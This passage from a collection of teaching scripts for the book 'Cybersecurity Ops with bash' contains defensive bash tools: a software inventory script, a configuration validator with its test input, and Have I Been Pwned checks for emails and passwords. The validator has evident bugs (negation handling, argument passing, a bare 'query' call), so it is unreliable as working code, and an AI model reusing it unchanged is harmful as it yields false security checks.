    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# softinv.sh\n#\n# Description: \n# list the software installed on a system\n# for later aggregation and analysis;\n#\n# Usage: ./softinv.sh [filename]\n# output is written to $1 or <hostname>_softinv.txt\n# \n\n# set the output filename\nOUTFN=\"${1:-${HOSTNAME}_softinv.txt}\"\t\t\t\t# <1>\n\n# which command to run depends on the OS and what's there\nOSbase=win\ntype -t rpm &> /dev/null\t\t\t\t\t# <2>\n(( $? == 0 )) && OSbase=rpm\t\t\t\t\t# <3>\ntype -t dpkg &> /dev/null\n(( $? == 0 )) && OSbase=deb\ntype -t apt &> /dev/null\n(( $? == 0 )) && OSbase=apt\n\ncase ${OSbase} in\t\t\t\t\t\t# <4>\n    win)\n\tINVCMD=\"wmic product get name,version //format:csv\"\n\t    ;;\n    rpm)\n    \tINVCMD=\"rpm -qa\"\n\t    ;;\n    deb)\n\tINVCMD=\"dpkg -l\"\n\t    ;;\n    apt)\n    \tINVCMD=\"apt list --installed\"\n\t    ;;\n    *)\n    \techo \"error: OSbase=${OSbase}\"\n\texit -1\n\t    ;;\nesac\n\n#\n# run the inventory\n#\n$INVCMD 2>/dev/null > $OUTFN\t\t\t\t\t# <5>\n\n"
  },
  {
    "path": "ch21/test.input",
    "content": "file  ./TODO.txt\n!file  ./validate.sh\n!file nogo.sh\nuser albing\n!user bob\ngroup mysql\n!group skip\nhash a7f36f4519661cf2aaaf0ebf057f768fc35dafe8  validate.sh\nhash b79f70b18538de0199e6829e06b547e079df8842  /bin/ls\n"
  },
  {
    "path": "ch21/validateconfig.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# validateconfig.sh\n#\n# Description: \n# Validate a specified configuration exists\n#\n# Usage:\n# validateconfig.sh < configfile\n#\n# configuration specification looks like:\n# [[!]file|hash|reg|[!]user|[!]group] [args]\n# examples:\n# file /usr/local/bin/sfx \t\t- file exists\n# hash 12384970347 /usr/local/bin/sfx   - file has this hash\n# !user bono\t\t\t\t- no user \"bono\" allowed\n# group students\t\t\t- must have a students group\n#\n# errexit - show correct usage and exit\nfunction errexit ()\n{\n    echo \"invalid syntax at line $ln\"\n    echo \"usage: [!]file|hash|reg|[!]user|[!]group [args]\"    # <1>\n    exit 2\n\n} # errexit\n\n# vfile - vaildate the [non]existance of filename\n#\targs: 1: the \"not\" flag - value:1/0 \n#             2: filename\n#\nfunction vfile ()\n{\n    local isThere=0\n    [[ -e $2 ]] && isThere=1                    # <2>\n    (( $1 )) && let isThere=1-$isThere          # <3>\n\n    return $isThere\n\n} # vfile\n\n# verify the user id\nfunction vuser ()\n{\n    local isUser\n    $UCMD $2 &>/dev/null\n    isUser=$?\n    if (( $1 ))                                 # <4>\n    then\n        let isUser=1-$isUser\n    fi\n\n    return $isUser\n\n} # vuser\n\n# verify the group id\nfunction vgroup ()\n{\n    local isGroup\n    id $2 &>/dev/null\n    isGroup=$?\n    if (( $1 ))\n    then\n        let isGroup=1-$isGroup\n    fi\n\n    return $isGroup\n\n} # vgroup\n\n# verify the hash on the file\nfunction vhash ()\n{\n    local res=0\n    local X=$(sha1sum $2)                       # <5>\n    if [[ ${X%% *} == $1 ]]                     # <6>\n    then\n        res=1\n    fi\n\n    return $res\n\n} # vhash\n\n# a windows system registry check\nfunction vreg ()\n{\n    local res=0\n    local keypath=$1\n    local value=$2\n    local expected=$3\n    local REGVAL=$(query $keypath //v $value)\n\n    if [[ $REGVAL == $expected ]]\n    then\n        res=1\n    fi\n    return $res\n\n} # vreg\n\n#\n# main\n#\n\n# do this once, for use in verifying user ids\nUCMD=\"net user\"\ntype -t net &>/dev/null  || UCMD=\"id\"           # <7>\n\nln=0\nwhile read cmd args\ndo\n    let ln++\n\n    donot=0\n    if [[ ${cmd:0:1} == '!' ]]                  # <8>\n    then\n        donot=1\n\tbasecmd=${cmd#\\!}                       # <9>\n    fi\n\n    case \"$basecmd\" in\n    file)\n        OK=1\n        vfile $donot \"$args\"\n        res=$?\n        ;;\n    hash)\n        OK=1\n\t# split args into 1st word , remainder\n        vhash \"${args%% *}\" \"${args#* }\"        # <10>\n        res=$?\n        ;;\n    reg)\n        # Windows Only!\n        OK=1\n        vreg $args\n        res=$?\n        ;;\n    user)\n        OK=0\n        vuser $args\n        res=$?\n        ;;\n    group)\n        OK=0\n        vgroup $args\n        res=$?\n        ;;\n    *)  errexit\t\t\t\t\t# <11>\n        ;;\n    esac\n    \n    if (( res != OK )) \n    then\n        echo \"FAIL: [$ln] $cmd $args\"\n    fi\ndone\n\n"
  },
  {
    "path": "ch22/checkemail.1liner",
    "content": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n#                 the Have I Been Pwned? database\n#\t\t  in 1 line\n\nEMAILIN=\"$1\"\nif (( \"$#\" == 0 ))                     #<1>\nthen\n    printf 'Enter email address: '\n    read EMAILIN\nfi\nEMAILIN=\"https://haveibeenpwned.com/api/v2/breachedaccount/$EMAILIN\"\n\necho 'Account pwned in the following breaches:'\ncurl -s \"$EMAILIN\" | grep -Po '\"Name\":\".*?\"' | cut -d':' -f2 | tr -d '\\\"'  #<2>\n"
  },
  {
    "path": "ch22/checkemail.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkemail.sh\n#\n# Description: \n# check an email address against the\n# Have I Been Pwned? database\n#\n# Usage: ./checkemail.sh [<email>]\n#   <email> Email address to check; default: reads from stdin\n#\n\nif (( \"$#\" == 0 ))\t#<1>\nthen\n\tprintf 'Enter email address: '\n\tread emailin\nelse\n\temailin=\"$1\"\nfi\n\npwned=$(curl -s \"https://haveibeenpwned.com/api/v2/breachedaccount/$emailin\")\t#<2>\n\nif [ \"$pwned\" == \"\" ]\nthen\n\texit 1\nelse\n\techo 'Account pwned in the following breaches:'\n\techo \"$pwned\" | grep -Po '\"Name\":\".*?\"' | cut -d':' -f2 | tr -d '\\\"'\t#<3>\n\texit 0\nfi\n\n"
  },
  {
    "path": "ch22/checkemailAlt.sh",
    "content": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n#                 the Have I Been Pwned? database\n#\n\nif (( \"$#\" == 0 ))                     #<1>\nthen\n    printf 'Enter email address: '\n    read emailin\nelse\n    emailin=\"$1\"\nfi\n\nURL=\"https://haveibeenpwned.com/api/v2/breachedaccount/$emailin\"\npwned=$(curl -s \"$URL\" |  grep -Po '\"Name\":\".*?\"' )   #<2>\n\nif [ \"$pwned\" == \"\" ]\nthen\n    exit 1\nelse\n    echo 'Account pwned in the following breaches:'   # <3>\n    pwned=\"${pwned//\\\"/}\"         # remove all quotes\n    pwned=\"${pwned//Name:/}\"      # remove all 'Name:'\n    echo \"${pwned}\"\n    exit 0\nfi\n"
  },
  {
    "path": "ch22/checkpass.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkpass.sh\n#\n# Description: \n# Check a password against the\n# Have I Been Pwned? database\n#\n# Usage: ./checkpass.sh [<password>]\n#   <password> Password to check\n#   default: read from stdin\n#\n\nif (( \"$#\" == 0 ))                              #<1>\nthen\n    printf 'Enter your password: '\n    read -s passin                              #<2>\n\techo\nelse\n    passin=\"$1\"    \nfi\n\npassin=$(echo -n \"$passin\" | sha1sum)\t          #<3>\npassin=${passin:0:40}\n\nfirstFive=${passin:0:5}                         #<4>\nending=${passin:5}\n\npwned=$(curl -s \"https://api.pwnedpasswords.com/range/$firstFive\" | \\\n        tr -d '\\r' | grep -i \"$ending\" )        #<5>\npasswordFound=${pwned##*:}                      #<6>\n\n\nif [ \"$passwordFound\" == \"\" ]\nthen\n    exit 1\nelse\n    printf 'Password is Pwned %d Times!\\n' \"$passwordFound\"\n    exit 0\nfi\n\n"
  },
  {
    "path": "ch22/emailbatch.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# emailbatch.sh\n#\n# Description: \n# Read in a file of email addresses and run them\n# against Have I Been Pwned\n#\n# Usage: ./emailbatch.sh [<filename>]\n#   <filename> File with one email address on each line\n#   default: reads from stdin\n#\n\ncat \"$1\" | tr -d '\\r' | while read fileLine\t\t#<1>\ndo\t\n\t./checkemail.sh \"$fileLine\" > /dev/null\t#<2>\n\t\n\tif (( \"$?\" == 0 ))\t#<3>\n\tthen\n\t\techo \"$fileLine is Pwned!\"\n\tfi\n\t\n\tsleep 0.25\t\t#<4>\ndone\n"
  },
  {
    "path": "readme.txt",
    "content": "Cybersecurity Ops with bash\nAttack, Defend, and Analyze from the Command Line\n----------------------------------------------------------------------------------------\n                                   Scripts Version 1.0\n----------------------------------------------------------------------------------------\n\nAbout\n----------------------------------------------------------------------------------------\nAll of the scripts and data referenced in the book are included with this file. The\nnumber tags (i.e. <1>, <2>, <3>) contained in each script file corresponds to the\nnumbered callout explanations from within the book.\n\n\nScript Robustness\n----------------------------------------------------------------------------------------\nThe included scripts are written to illustrate and teach concepts. The\nscripts are not designed to be efficient or robust enough for enterprise deployment.\nUse caution if you choose to use the scripts in a live environment. Be sure to follow\nprogramming best practices and test your scripts before deployment.\n\n\nDisclaimer\n----------------------------------------------------------------------------------------\nThe included scripts are provided \"as is\" and without any warranties or guarantees.\n\n----------------------------------------------------------------------------------------\n                                https://www.rapidcyberops.com\n----------------------------------------------------------------------------------------"
  }
]